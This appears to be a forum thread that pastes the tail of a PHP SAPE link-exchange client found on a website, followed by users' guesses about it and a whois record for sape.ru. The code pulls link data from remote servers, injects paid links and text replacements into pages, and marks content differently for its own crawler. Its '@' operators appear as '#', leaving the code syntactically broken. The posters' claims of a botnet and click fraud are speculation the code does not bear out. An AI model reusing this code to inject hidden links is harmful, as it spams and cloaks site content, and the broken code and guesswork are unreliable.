}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
#ini_set('allow_url_fopen', 1);
#ini_set('default_socket_timeout', $this->_socket_timeout);
#ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = #file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = #curl_init()) {
#curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
#curl_setopt($ch, CURLOPT_HEADER, false);
#curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
#curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
#curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = #curl_exec($ch)) {
return $data;
}
#curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = #fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
#fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
#fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!#feof($fp)) {
$buff .= #fgets($fp, 128);
}
#fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = #fopen($filename, 'rb');
#flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = #filesize($filename);
$mqr = #get_magic_quotes_runtime();
#set_magic_quotes_runtime(0);
if ($length) {
$data = #fread($fp, $length);
}
else {
$data = '';
}
#set_magic_quotes_runtime($mqr);
#flock($fp, LOCK_UN);
#fclose($fp);
return $data;
}
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
function _write($filename, $data) {
$fp = #fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
#fwrite($fp, $data, $length);
#flock($fp, LOCK_UN);
#fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
#unlink($filename);
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (#touch($this->_db_file)) {
#chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
#clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
#unserialize($data) == false
)
)
) {
#touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = #unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = #serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(#unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = #iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (#array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
//Заменяем все сущности на символы
$special_chars = array(
'&' => '&',
'"' => '"',
''' => '\'',
'<' => '<',
'>' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|( ))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (#array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>
Sape is apparently link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google transition of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david#archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david#archtower ~]$
Looks like it's something to automatically visit ads referral links at first glance.